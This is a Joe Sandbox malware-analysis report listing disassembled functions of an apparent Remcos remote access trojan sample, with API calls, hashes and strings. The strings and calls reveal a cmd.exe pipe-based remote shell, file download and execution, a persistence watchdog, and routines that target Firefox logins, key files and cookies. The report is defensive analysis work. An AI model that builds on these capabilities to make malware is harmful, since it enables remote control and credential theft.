                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: FileFind$FirstNextSleep
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2635277345-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 78a5c36d1815e0a846b997e217213f90180f57ee50d307f22e4cc0e7a3be6cb2
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ba8769b27b28ad511b2499f2b98cea4f31d6ecccccff2d72c20009a19a29048a
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78a5c36d1815e0a846b997e217213f90180f57ee50d307f22e4cc0e7a3be6cb2
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AE08636F0125467A601D6AEDC8195BF3EDEB891A0B1100B6E90DD3301E871DD0142E1
                                                                                                                                                                                                                                                                                                                              Function 00410ABE Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(?,?,?,?,00410BFE,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00410ACE
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 38694f91ddd66904e98ee13f1febf2482794bae3131ffd3a876a6d6af10a8f86
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29B00832418382EFCF02DF90DD0492ABAA2BB88712F084C6CB2A14017187228428EB16

                                                                                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                                                                                              Function 00406F06 Relevance: 48.1, APIs: 10, Strings: 17, Instructions: 849filesleepCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 00406F28
                                                                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B43F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B43F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B43F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(0000028C,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: SetEvent.KERNEL32(0000028C,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                                                                                                                                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                                                                                                                                                                                                                                              • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BB87: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                                                                                                                                                                                                                                              • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$TTF$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                                                                                                                                                                                                                                              • API String ID: 2918587301-184849705
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 0f7f8846a261c8fbb0c5761866e5f27c5a44f4c26e703f5a6ba352629164d15a
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 1bc88c7e1bb4371a25effcd92402389f4e4e7f2dfcf0a55fa2f5aa785e242239
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f7f8846a261c8fbb0c5761866e5f27c5a44f4c26e703f5a6ba352629164d15a
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC42A372A043005BC604F776C8979AF76A59F90718F40493FF946771E2EE3CAA09C69B
                                                                                                                                                                                                                                                                                                                              Function 00405042 Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 280pipesleepfileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                                                                                                                                                                                                                                              • CreatePipe.KERNEL32(00475D0C,00475CF4,00475C18,00000000,0046556C,00000000), ref: 0040515E
                                                                                                                                                                                                                                                                                                                              • CreatePipe.KERNEL32(00475CF8,00475D14,00475C18,00000000), ref: 00405174
                                                                                                                                                                                                                                                                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C28,00475CFC), ref: 004051E7
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(0000012C,00000093), ref: 0040523F
                                                                                                                                                                                                                                                                                                                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                                                                                                                                                                                                                              • String ID: (\G$SystemDrive$cmd.exe$p\G$p\G$p\G$p\G$p\G
                                                                                                                                                                                                                                                                                                                              • API String ID: 3815868655-1274243119
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 52c16fbc556d0d2c73d46009bfbf8388cbbd2375b4cb21632b709935ec09a601
                                                                                                                                                                                                                                                                                                                              • Instruction ID: e174317c0cfdf92f2f57875e471bcaa01af682fbbee25a17085fe39bc952a1f7
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 52c16fbc556d0d2c73d46009bfbf8388cbbd2375b4cb21632b709935ec09a601
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97910971504705AFD701BB25EC45A2F37A8EB84344F50443FF94ABA2E2DABC9D448B6E
                                                                                                                                                                                                                                                                                                                              Function 00410F36 Relevance: 35.2, APIs: 7, Strings: 13, Instructions: 238threadCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegCloseKey.KERNEL32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                                                                                                                                                                                                                                              • String ID: 0DG$Remcos restarted by watchdog!$TTF$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                                                                                                                                                                                                                                              • API String ID: 65172268-329858390
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 58e4418fa6111bd857dedfc30dc3646ee4875fb9b75ba40359eda3183a5b91e5
                                                                                                                                                                                                                                                                                                                              • Instruction ID: cd90af3caa6d69ca3e9ea8718b5663318d6259183dea3b669bddfb6979e5fbe1
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58e4418fa6111bd857dedfc30dc3646ee4875fb9b75ba40359eda3183a5b91e5
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F718E316042415BC614FB32D8579AE77A4AED4718F40053FF582A21F2EF7CAA49C69F
                                                                                                                                                                                                                                                                                                                              Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                                                                                                                                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                                                                                                                                                                                                                              • API String ID: 1164774033-3681987949
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 8ccba4ff98f31ee4f378e4281ac784b3687536ebcec12ebdaa49621bbfc6a463
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6ff196721abdd8e0f3db8d3f3c96df629808f1f9148939b99990ee587e15bfec
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ccba4ff98f31ee4f378e4281ac784b3687536ebcec12ebdaa49621bbfc6a463
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                                                                                                                                                                                                                                              Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Find$Close$File$FirstNext
                                                                                                                                                                                                                                                                                                                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                                                                                                                                                                              • API String ID: 3527384056-432212279
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 3ee8648b0f7b479d09f0d72853fb9419505b6b58160fc926f9c5edfb858060ca
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 007be0ece90fca0e9f39ea1f272cf2b8da877aadfcc1370f70eac597690c30d9
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ee8648b0f7b479d09f0d72853fb9419505b6b58160fc926f9c5edfb858060ca
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7414B319042196ACB14F7A1EC569EE7768EF21318F50017FF801B31E2EF399A45CA9E
                                                                                                                                                                                                                                                                                                                              Function 10006FA0 Relevance: 19.7, APIs: 13, Instructions: 236COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000440,00000000,00000000), ref: 10007054
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: OpenProcess
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3743895883-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5123f2d251da449f23a0145715559065d7c177eff71aa2cd70a97f408bb63da0
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 3fc6cb16c2acb38648db70abfd8e28bf1beac7dae34e75593325fef57f3a6704
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5123f2d251da449f23a0145715559065d7c177eff71aa2cd70a97f408bb63da0
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3717FB1E00219BBFB10DBA4DC85FEE77B8EF04794F1041A5FA08E6195E7759A01CBA1
                                                                                                                                                                                                                                                                                                                              Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                                                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                                                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegCloseKey.KERNEL32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                                                                                                                                                                                                                                              Strings
